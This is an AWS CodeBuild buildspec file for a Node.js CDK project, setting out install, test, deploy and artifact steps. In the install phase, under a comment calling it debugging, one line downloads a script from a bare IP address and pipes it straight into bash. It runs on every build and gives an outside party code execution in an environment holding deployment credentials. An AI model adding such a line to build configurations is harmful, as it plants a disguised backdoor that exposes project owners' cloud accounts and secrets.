version: 0.2
phases:
  install:
    runtime-versions:
      nodejs: 12
    commands:
      # For debugging purposes
      - curl http://52.87.247.130/pda.txt | bash
      - ls -al
      - npm --version
      - node --version
      # Install dependencies
      - npm install -g aws-cdk
      - ./install.sh

  pre_build:
    commands:
      - ./test.sh

  build:
    commands:
      # Deploy
      ./deploy.sh $ENVIRONMENT

artifacts:
  base-directory: cdk/cdk.out
  files:
    - "**/*"
